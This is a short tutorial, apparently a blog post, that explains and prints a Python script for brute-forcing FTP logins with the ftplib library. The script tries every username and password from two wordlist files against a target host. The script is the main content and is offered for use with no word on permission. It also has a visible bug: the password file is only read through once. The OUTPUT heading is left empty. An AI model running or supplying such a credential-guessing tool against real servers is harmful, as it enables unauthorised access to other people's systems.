The article will guide you on how to bruteforce FTP using ftplib library in python. I have already posted an article on how to check for anonymous FTP script. FTP is File transfer protocol which is used to upload/download files from server to client. It works on Port 21. FTPLIB provides many features to python to connect and handle FTP connections.
Explanation:
The code is pretty forward. We will import the ftplib library and sys to use arguments
def logfile(target,users,passw): This function works for the user and password files. It opens them and passes them to the function bruteftp.
def bruteftp(target,users,passw): This function takes the input sent by the logfile() function and remove the carriage return and newline from the user and password which came directly from the file using *.strip(‘\r’).strip(‘\n’). Once removed, it passes the new stripped user and password to the ftp.login() to check if they are correct.
CODE:
#!/usr/bin/python3 import ftplib import sys def logfile(target,users,passw): try: ufile=open(users,'r') pfile=open(passw,'r') for user in ufile.readlines(): for password in pfile.readlines(): bruteftp(target,user,password) except Exception as e: print(e) def bruteftp(target,users,passw): try: ftp=ftplib.FTP(target) user=users.strip('\r').strip('\n') password=passw.strip('\r').strip('\n') print('Trying with: '+user+" "+password) ftp.login(user,password) ftp.quit() print('Login succeeded with: '+user+" "+password) return(user,passw) except Exception as e: print("Incorrect credentials.") return(None,None) if len(sys.argv) !=4: print("Not enough arguments:\n"+\ 'Usage: ftpc.py target userfile passfile') else: host=sys.argv[1] users=sys.argv[2] passw=sys.argv[3] logfile(host,users,passw)
OUTPUT: